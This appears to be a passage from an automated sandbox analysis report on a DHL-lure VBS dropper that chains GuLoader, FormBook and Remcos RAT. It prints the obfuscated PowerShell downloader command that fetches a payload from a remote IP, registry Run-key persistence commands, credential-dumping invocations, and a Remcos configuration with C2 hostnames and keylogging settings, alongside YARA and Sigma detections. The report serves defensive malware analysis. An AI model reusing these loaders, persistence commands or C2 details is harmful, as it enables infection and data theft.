Vi.r$VatiHkapevHydri LetrStatvA,allSpaaeCocos Hae ');Jettes (Circumflexes 'Tenn$ JusgPorzl HolochacbUnp aB,vrl Uar:chawAPostbOpgrjModeuScordForgi.yrec andaOvert,tereHern Diss= sta Ciga[flagSHoveyAfghsJesut Sube ConmTool. VrdCSingoForfn Myov,rlleOthir s.itUnva]Astr:Kont:BeviFsamorCarroPlanmliftBanh aTil,sC.rreDown6arbe4UnfrSA.altFestr Veji Civn,tilg,onr(Fors$KnskH PeroPrebv.oule StadForusWrestPerirs.etuser k TaltEkstuDecarPumpeHyper Ne.n H,le Mims Uds)Br.c ');Jettes (Circumflexes ',eta$O elgEr,vl BenoskrmbmesoaMalllAlon:bifiLS.tivA.glhAstry ObetModetud.meSk,lr KlonEmboeSupe Ungd=Stil prie[ChurS isey kovsInittEl ve HucmGram. In,TBazoeKonsxRu,gtSk,a. VogE,ekanhempc ,oso MatdStn,iDrifnSa mgAdmi] Pej: La : MasAInskSStriC Ud,I ComIInda.UnreGVarieTeatt .ilSSmeltPaver U.fiMyrenManggAgna(Dekl$GuidA.omabOrdrjFreiu .tad,onhiUnfacIndka KabtRelaeGoom) U,l ');Jettes (Circumflexes 'Semi$Par,gNongl SupoB,rebBe raGrsrlF.ld:Res,SMultk Foli fugkU,sak GeneBol,lAcets frueconjnSm.tsR bb=luge$NotaL ,gev,aglh UngyMam.tFarvtPayoeSatirSisynKom,e ,ke.Ka,as.onbuDeutb KoesBorutSeksrEli iTelenMyopgtra,(Ser,3Faul1O.om4Efte7 lot8Unwa4 Fr.,Forb2 .lo6 Mid3Ba o0.arv2Mis )Coup ');Jettes $Skikkelsens;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 3364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cmd.exe (PID: 3996 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • powershell.exe (PID: 6324 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jettes (Circumflexes ' Hic$DefiSGoo k.orteTranpNulvtgummi,nfrcO,dy. skrHUn ieAa aa PerdSp,reBillrJordsB.am[Frug$FormOSuttpFidutLnsird nkiGiggnBlansfeer4I da5Over]Korv=Reig$di,kS StuiUhelmInseuKnsklLeattu,spadur.nQuadsEmulc CykeSlavn H pe Regr fkosUdry ');$Isoln=Circumflexes ' .meS,ondkSka eSemipUndetSpgeiP,nccAver.Mer.DAnomoP stw.deanthrolov roFarta N,ddSt dFAssui Krel Bd,eUntr(Ove,$OmsoLScarePerevDyreeflyvmJi buStorl Kkki PergWarnh ikleFuldd .dr,Gfor$.aktHEpisvPriniHarerSexuv PholBll e Pros ya)un.h ';$Isoln=$Forankringspunktets[1]+$Isoln;$Hvirvles=$Forankringspunktets[0];Jettes (Circumflexes ' Sh $Eft gPounlFromoUfatb iea S,ilUnc,:CasuPFlanuStjdnVaskc B.otRighuU.tis Sor=hu,t(SculTCorreOutks Th,tReal-SyttP avaRingt Tr hThru Modt$GlauH.elfvForkiTensrr.prvMowelLaise Pe.s eat) Tyn ');while (!$Punctus) {Jettes (Circumflexes 'Unpr$B.blgPolylPorto Ba.bKampaAzidlPaal:MonomUdslaharorCanacBdeaeBr.nsSupecSubreSretn ThocTor.eDat,=Macr$.xtrtOverrBobbuNonseHnge ') ;Jettes $Isoln;Jettes (Circumflexes ' MinSKu.ttPensaOverr ynetMatr-PromSMin lThimeCosteSkndpSkva npa4,esp ');Jettes (Circumflexes 'Ufor$ SilgKat.lLiquochokbBrnda Trol kur:SnowPPostuAndenAnlgcAf.utSk.duAffesOver=Bram( afgT DrieRemisOwentFelt- UdfPBlomaD,fftRe,vhNd.i Frad$ ollH Tipv ProiHyd rUp.av ForlBefoeProjsHjes)Sewm ') ;Jettes (Circumflexes 'Coin$ OrngWaftlB.reo veb Scoa AttlQuis:.axiVDekroAggrl Spol s.ae ParyJingbResuaAlcolDamplVo,dsBlr,=Skub$ProtgRufflserooR.cibLe ea MenlAr,o: O.eMEmmeaTommgForriUdbrkK.sse,kkor.trinAksge aars.jem+Inst+ T l%Prom$BecrAVarsl UdtvShoreHvo,oLeavlTrieiCrybtAcceeTveds Jvn.LeptcMetaoRegou eren,amnt .is ') ;$Levemulighed=$Alveolites[$Volleyballs];}Jettes (Circumflexes 'Anon$ LiggAsenlUnchoOph.bPalaa utilSubm:TndeHCyatoConcvNonoeDelidApoksBruntStemrHermuCou,kringtr thuRingrUheleSrstrBiocnSla.e,refsTil, D.st=Matr Di,GAmate galtBesk-DissCNon.oCournPartt FoueUf.dnM,wstCamb Vi.r$VatiHkapevHydri LetrStatvA,allSpaaeCocos Hae ');Jettes (Circumflexes 'Tenn$ JusgPorzl HolochacbUnp aB,vrl Uar:chawAPostbOpgrjModeuScordForgi.yrec andaOvert,tereHern Diss= sta Ciga[flagSHoveyAfghsJesut Sube ConmTool. VrdCSingoForfn Myov,rlleOthir s.itUnva]Astr:Kont:BeviFsamorCarroPlanmliftBanh aTil,sC.rreDown6arbe4UnfrSA.altFestr Veji Civn,tilg,onr(Fors$KnskH PeroPrebv.oule StadForusWrestPerirs.etuser k TaltEkstuDecarPumpeHyper Ne.n H,le Mims Uds)Br.c ');Jettes (Circumflexes ',eta$O elgEr,vl BenoskrmbmesoaMalllAlon:bifiLS.tivA.glhAstry ObetModetud.meSk,lr KlonEmboeSupe Ungd=Stil prie[ChurS isey kovsInittEl ve HucmGram. In,TBazoeKonsxRu,gtSk,a. VogE,ekanhempc ,oso MatdStn,iDrifnSa mgAdmi] Pej: La : MasAInskSStriC Ud,I ComIInda.UnreGVarieTeatt .ilSSmeltPaver U.fiMyrenManggAgna(Dekl$GuidA.omabOrdrjFreiu .tad,onhiUnfacIndka KabtRelaeGoom) U,l ');Jettes (Circumflexes 'Semi$Par,gNongl SupoB,rebBe raGrsrlF.ld:Res,SMultk Foli fugkU,sak GeneBol,lAcets frueconjnSm.tsR bb=luge$NotaL ,gev,aglh UngyMam.tFarvtPayoeSatirSisynKom,e ,ke.Ka,as.onbuDeutb KoesBorutSeksrEli iTelenMyopgtra,(Ser,3Faul1O.om4Efte7 lot8Unwa4 Fr.,Forb2 .lo6 Mid3Ba o0.arv2Mis )Coup ');Jettes $Skikkelsens;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • cmd.exe (PID: 1848 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • wab.exe (PID: 5144 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
                • wab.exe (PID: 1968 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
                  • cmd.exe (PID: 6444 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                    • conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • reg.exe (PID: 4296 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
                  • qDlmBUIvkRrWNd.exe (PID: 1776 cmdline: "C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                    • clip.exe (PID: 6720 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
                      • qDlmBUIvkRrWNd.exe (PID: 5244 cmdline: "C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                      • firefox.exe (PID: 6292 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
          • wab.exe (PID: 6624 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\eeubmxzcykpvacklrogamlalknwo" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 4220 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 5036 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 6668 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 5852 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zbfe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • wab.exe (PID: 3252 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 6148 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wab.exe (PID: 3396 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\mvourhjs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a540:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13adf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000005.00000002.2490726122.0000000008980000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000005.00000002.2461742751.0000000005DFF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000016.00000002.2900248668.0000000008830000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 25 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_2132.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0xfd2e:$b2: ::FromBase64String(
            • 0xd0a9:$s1: -join
            • 0x10fa2:$s3: Reverse
            • 0x6855:$s4: +=
            • 0x6917:$s4: +=
            • 0xab3e:$s4: +=
            • 0xcc5b:$s4: +=
            • 0xcf45:$s4: +=
            • 0xd08b:$s4: +=
            • 0xf2da:$s4: +=
            • 0xf35a:$s4: +=
            • 0xf420:$s4: +=
            • 0xf4a0:$s4: +=
            • 0xf676:$s4: +=
            • 0xf6fa:$s4: +=
            • 0xd7c3:$e4: Get-WmiObject
            • 0xd9b2:$e4: Get-Process
            • 0xda0a:$e4: Start-Process
            amsi32_2668.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0xfc80:$b2: ::FromBase64String(
            • 0xd0a9:$s1: -join
            • 0x10ef4:$s3: Reverse
            • 0x6855:$s4: +=
            • 0x6917:$s4: +=
            • 0xab3e:$s4: +=
            • 0xcc5b:$s4: +=
            • 0xcf45:$s4: +=
            • 0xd08b:$s4: +=
            • 0xf2da:$s4: +=
            • 0xf35a:$s4: +=
            • 0xf420:$s4: +=
            • 0xf4a0:$s4: +=
            • 0xf676:$s4: +=
            • 0xf6fa:$s4: +=
            • 0xd7c3:$e4: Get-WmiObject
            • 0xd9b2:$e4: Get-Process
            • 0xda0a:$e4: Start-Process
            • 0x1779d:$e4: Get-Process
            amsi32_5804.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0xc4cd:$b2: ::FromBase64String(
            • 0x9861:$s1: -join
            • 0x300d:$s4: +=
            • 0x30cf:$s4: +=
            • 0x72f6:$s4: +=
            • 0x9413:$s4: +=
            • 0x96fd:$s4: +=
            • 0x9843:$s4: +=
            • 0xba9e:$s4: +=
            • 0xbb1e:$s4: +=
            • 0xbbe4:$s4: +=
            • 0xbc64:$s4: +=
            • 0xbe3a:$s4: +=
            • 0xbebe:$s4: +=
            • 0x9f87:$e4: Get-WmiObject
            • 0xa176:$e4: Get-Process
            • 0xa1ce:$e4: Start-Process
            amsi32_6324.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0xc437:$b2: ::FromBase64String(
            • 0x9861:$s1: -join
            • 0x300d:$s4: +=
            • 0x30cf:$s4: +=
            • 0x72f6:$s4: +=
            • 0x9413:$s4: +=
            • 0x96fd:$s4: +=
            • 0x9843:$s4: +=
            • 0xba9e:$s4: +=
            • 0xbb1e:$s4: +=
            • 0xbbe4:$s4: +=
            • 0xbc64:$s4: +=
            • 0xbe3a:$s4: +=
            • 0xbebe:$s4: +=
            • 0x9f87:$e4: Get-WmiObject
            • 0xa176:$e4: Get-Process
            • 0xa1ce:$e4: Start-Process
            • 0x134fc:$e4: Get-Process

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Script Interpreter Execution From Suspicious Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1496, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs" , ProcessId: 6984, ProcessName: wscript.exe
            Sigma detected: Suspicious Script Execution From Temp Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1496, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs" , ProcessId: 6984, ProcessName: wscript.exe
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs", ProcessId: 1992, ProcessName: wscript.exe
            Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1496, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)", ProcessId: 2140, ProcessName: cmd.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6548, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vibeka
            Sigma detected: Direct Autorun Keys Modification
            Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2140, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)", ProcessId: 6548, ProcessName: reg.exe
            Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1496, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)", ProcessId: 2140, ProcessName: cmd.exe
            Sigma detected: Suspicious Powershell In Registry Run Keys
            Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: %Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6548, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vibeka
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
